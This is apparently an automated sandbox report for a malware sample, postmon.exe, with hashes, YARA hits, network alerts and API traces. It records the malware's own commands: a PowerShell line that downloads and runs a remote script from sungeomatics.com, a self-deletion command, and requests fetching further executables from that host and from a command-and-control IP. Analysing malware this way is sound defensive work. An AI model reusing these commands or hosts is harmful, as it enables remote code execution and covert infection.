Summary | ZeroBOX

postmon.exe

Generic Malware UPX Antivirus Malicious Library Malicious Packer PE File OS Processor Check PE32 PowerShell
Category: FILE
Machine: s1_win7_x6401
Started: June 22, 2023, 10:31 a.m.
Completed: June 22, 2023, 10:35 a.m.
Size 382.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 f7d6bd06f96439787aa170983ab55c3e
SHA256 69a695a22c366f9ccdbcb42e6654834bbecef41cda7f9cd2d81d21912fcd0a1c
CRC32 58F18954
ssdeep 6144:q0FPy3bQeuMyxK2hGFgAObpOXFVrZLqaZ3A8ihSxfw+o7Rpybm:qV3GdGFgliX5+JUq+eAm
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)

DNS (Name / Response / Post-Analysis Lookup)
sungeomatics.com -> 205.134.251.88

Hosts (IP Address / Status / Action)
164.124.101.2 Active Moloch
195.123.226.82 Active Moloch
205.134.251.88 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49170 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow / Issuer / Subject / Fingerprint

TLSv1 192.168.56.101:49162 -> 205.134.251.88:443
  Issuer: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  Subject: CN=sungeomatics.com
  Fingerprint: a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

TLSv1 192.168.56.101:49165 -> 205.134.251.88:443
  Issuer: None
  Subject: None
  Fingerprint: None

TLSv1 192.168.56.101:49170 -> 205.134.251.88:443
  Issuer: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  Subject: CN=sungeomatics.com
  Fingerprint: a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f33c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7990
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7990
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001d62d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001d62d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f32e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f32e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8d3ea0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8d3ea0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
resource name AFX_DIALOG_LAYOUT
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/dd_64.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc4.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc5.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc1.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/debug2.ps1
request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
request GET https://sungeomatics.com/css/colors/dd_64.exe
request GET https://sungeomatics.com/css/colors/cc2.exe
request GET https://sungeomatics.com/css/colors/cc3.exe
request GET https://sungeomatics.com/css/colors/cc4.exe
request GET https://sungeomatics.com/css/colors/cc5.exe
request GET https://sungeomatics.com/css/colors/cc1.php
request GET https://sungeomatics.com/css/colors/cc2.php
request GET https://sungeomatics.com/css/colors/cc3.php
request GET https://sungeomatics.com/css/colors/debug2.ps1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 2359296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ad0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3891000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00142000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00143000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0004a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00191000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c97000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
file C:\Users\test22\AppData\Local\Temp\postmon.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
